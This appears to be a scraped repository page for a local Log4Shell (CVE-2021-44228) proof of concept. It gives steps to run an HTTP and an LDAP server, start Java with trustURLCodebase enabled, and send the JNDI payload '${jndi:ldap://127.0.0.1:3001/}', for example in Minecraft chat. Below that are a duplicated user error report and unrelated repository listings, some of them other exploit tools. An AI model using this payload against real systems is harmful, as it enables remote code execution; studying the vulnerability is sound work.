log4j2-exploits

2021-12-11.12-17-44.mp4

This fundamental vulnerability was reported by CVE-2018-3149 and patched by this article. (8u121 Release Notes)

However, the logging library for java called log4j2 had JNDILookup, which allowed access to protocols such as LDAP, which allowed code injection in older java versions.

Patched versions of java can prevent code injection, but JNDILookup makes request to ldap server, which can lead to IP leaks.

The solution is to update Java and log4j2 versions.

Running

Install requirements

cd http-server && npm install
cd ldap-server && npm install

run http-server and ldap-server both

cd http-server && node index.js
cd ldap-server && node index.js

Compile Main.java

# This will generate Main.java - required to code injection.
javac Main.java

Start jvm with parameters

# You can still use log4j-client in repo for internal testing.
cd log4j-client
gradlew jar
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar build/libs/log4j-client-1.0-SNAPSHOT.jar
# Or run other application, com.sun.jndi.ldap.object.trustURLCodebase=true required for code injection, otherwise it will only request to ldap server.
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar [yourJar].jar

Send ${jndi:ldap://127.0.0.1:3001/} to any payloads. (In minecraft, just chatting this will work if exploits are working.)

References

License

CC0

Thanks a ton for your great local exploit! I'm just having a problem on Ubuntu with OpenJDK 11. When I tun the log4j-client-1.0-SNAPSHOT.jar file and pass in the string ${jndi:ldap://127.0.0.1:3001}, I get the following error:

Mon Dec 13 2021 08:50:12 GMT-0800 (Pacific Standard Time) Request was made: /Main.class 2021-12-13 08:50:12,761 main WARN Error looking up JNDI resource [ldap://127.0.0.1:3001/]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: class Main cannot be cast to class javax.naming.spi.ObjectFactory (Main is in unnamed module of loader java.net.FactoryURLClassLoader @2f217633; javax.naming.spi.ObjectFactory is in module java.naming of loader 'bootstrap')]; remaining name '' at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1121) at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542) at java.naming/com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompositeContext.java:177) at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:207) at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94) at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409) at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172) at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56) at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:198) at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1060) at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:982) at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:878) at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:433) at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132) at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38) at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:341) at org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:240) at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:225) at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:59) at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent(AbstractOutputStreamAppender.java:197) at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(AbstractOutputStreamAppender.java:190) at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:181) at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156) at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129) at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120) at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84) at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:543) at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:502) at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:485) at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:460) at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:82) at org.apache.logging.log4j.core.Logger.log(Logger.java:162) at org.apache.logging.log4j.spi.AbstractLogger.tryLogMessage(AbstractLogger.java:2190) at org.apache.logging.log4j.spi.AbstractLogger.logMessageTrackRecursion(AbstractLogger.java:2144) at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2127) at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:2003) at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1975) at org.apache.logging.log4j.spi.AbstractLogger.trace(AbstractLogger.java:2330) at win.roto.client.Main.main(Main.java:33) Caused by: java.lang.ClassCastException: class Main cannot be cast to class javax.naming.spi.ObjectFactory (Main is in unnamed module of loader java.net.FactoryURLClassLoader @2f217633; javax.naming.spi.ObjectFactory is in module java.naming of loader 'bootstrap') at java.naming/javax.naming.spi.NamingManager.getObjectFactoryFromReference(NamingManager.java:179) at java.naming/javax.naming.spi.DirectoryManager.getObjectInstance(DirectoryManager.java:188) at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1114) ... 38 more

I can see that it's certainly trying to trigger the vulnerability, but fails.

Examples and HowTos for BouncyCastle and Java Cryptography Extension (JCE)

CryptographicUtilities Examples and HowTos for BouncyCastle and Java Cryptography Extension (JCE) See class "/src/main/java/de/soderer/utilities/crypt

Dec 19, 2021

JAP is an open source authentication middleware, it is highly decoupled from business code and has good modularity and flexiblity. Developers could integrate JAP into web applications effortlessly.

🎨 JAP 是什么？ JAP 是一款开源的登录中间件，基于模块化设计，并且与业务高度解耦，使用起来非常灵活，开发者可以毫不费力地将 JAP 集

Dec 1, 2022

Jsp Decoder Source Code

AntSword-JSP-Decoder 解码器模版编译 python build.py 使用将 dist/ 目录生成的 js 覆盖 antSword/source/core/jsp/decoder/ 目录下的文件也可以直接从

Jun 20, 2022

JObfuscator is a source code obfuscator for the Java language

JObfuscator is a source code obfuscator for the Java language. Protect Java source code & algorithms from hacking, cracking, reverse engineering, decompilation & technology theft.

Nov 6, 2022

Log4j CVE-2021-44228 examples: Remote Code Execution (through LDAP, RMI, ...), Forced DNS queries, ...

Log4j CVE-2021-44228 and CVE-2021-45046 Requisites Use a vulnerable JDK, for instance JDK 1.8.0_181 Usage Malicious server The malicious server deploy

Feb 7, 2022

CVE-2021-44228 (Apache Log4j Remote Code Execution）

CVE-2021-44228 (Apache Log4j Remote Code Execution） all log4j-core versions =2.0-beta9 and =2.14.1 The version of 1.x has other vulnerabilities, it

Apr 23, 2022

JNDI-Exploit is an exploit on Java Naming and Directory Interface (JNDI) from the deleted project fromthe user feihong on GitHub.

JNDI-Exploit JNDI-Exploit is a fork from the deleted project ftom the user feihong-cs on GitHub. To learn more about JNDI and what you can do with thi

Dec 6, 2022

Remote Support Tool is an easy single click solution for remote maintenance.

Jun 13, 2022

Firestorm is a Remote Shuffle Service, and provides the capability for Apache Spark applications to store shuffle data on remote servers

What is Firestorm Firestorm is a Remote Shuffle Service, and provides the capability for Apache Spark applications to store shuffle data on remote ser

Nov 29, 2022

Google Mr4c GNU Lesser 3 Google Mr4c MR4C is an implementation framework that allows you to run native code within the Hadoop execution framework. License: GNU Lesser 3, .

Introduction to the MR4C repo About MR4C MR4C is an implementation framework that allows you to run native code within the Hadoop execution framework.

Dec 9, 2022

This tool can read the QR code from the Remote Admin menu and copy the ID of the User to the Clipboard.

SCP-SL-QR-Reader Tool for easy copying This tool can read the QR code from the Remote Admin menu and copy the ID of the User to the Clipboard. Detecta

Aug 14, 2021

100 Days of Code Learning program to keep a habit of coding daily and learn things at your own pace with help from our remote community.

Dec 30, 2022

SparkFE is the LLVM-based and high-performance Spark native execution engine which is designed for feature engineering.

Spark has rapidly emerged as the de facto standard for big data processing. However, it is not designed for machine learning which has more and more limitation in AI scenarios. SparkFE rewrite the execution engine in C++ and achieve more than 6x performance improvement for feature extraction. It guarantees the online-offline consistency which makes AI landing much easier. For further details, please refer to SparkFE Documentation.

Jun 10, 2021

One file java script for visualizing JDK flight recorder execution logs as flamegraphs without any dependencies except Java and a browser.

Flamegraph from JFR logs Simple one file Java script to generate flamegraphs from Java flight recordings without installing Perl and the Brendan Gregg

Oct 2, 2022

I get java.lang.ClasCastException for Main

Thanks a ton for your great local exploit! I'm just having a problem on Ubuntu with OpenJDK 11. When I tun the log4j-client-1.0-SNAPSHOT.jar file and pass in the string ${jndi:ldap://127.0.0.1:3001}, I get the following error:

Mon Dec 13 2021 08:50:12 GMT-0800 (Pacific Standard Time) Request was made: /Main.class 2021-12-13 08:50:12,761 main WARN Error looking up JNDI resource [ldap://127.0.0.1:3001/]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: class Main cannot be cast to class javax.naming.spi.ObjectFactory (Main is in unnamed module of loader java.net.FactoryURLClassLoader @2f217633; javax.naming.spi.ObjectFactory is in module java.naming of loader 'bootstrap')]; remaining name '' at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1121) at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542) at java.naming/com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompositeContext.java:177) at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:207) at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94) at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409) at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172) at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56) at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:198) at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1060) at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:982) at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:878) at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:433) at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132) at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38) at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:341) at org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:240) at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:225) at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:59) at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent(AbstractOutputStreamAppender.java:197) at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(AbstractOutputStreamAppender.java:190) at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:181) at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156) at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129) at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120) at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84) at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:543) at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:502) at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:485) at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:460) at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:82) at org.apache.logging.log4j.core.Logger.log(Logger.java:162) at org.apache.logging.log4j.spi.AbstractLogger.tryLogMessage(AbstractLogger.java:2190) at org.apache.logging.log4j.spi.AbstractLogger.logMessageTrackRecursion(AbstractLogger.java:2144) at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2127) at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:2003) at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1975) at org.apache.logging.log4j.spi.AbstractLogger.trace(AbstractLogger.java:2330) at win.roto.client.Main.main(Main.java:33) Caused by: java.lang.ClassCastException: class Main cannot be cast to class javax.naming.spi.ObjectFactory (Main is in unnamed module of loader java.net.FactoryURLClassLoader @2f217633; javax.naming.spi.ObjectFactory is in module java.naming of loader 'bootstrap') at java.naming/javax.naming.spi.NamingManager.getObjectFactoryFromReference(NamingManager.java:179) at java.naming/javax.naming.spi.DirectoryManager.getObjectInstance(DirectoryManager.java:188) at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1114) ... 38 more

I can see that it's certainly trying to trigger the vulnerability, but fails.

opened by franktate 1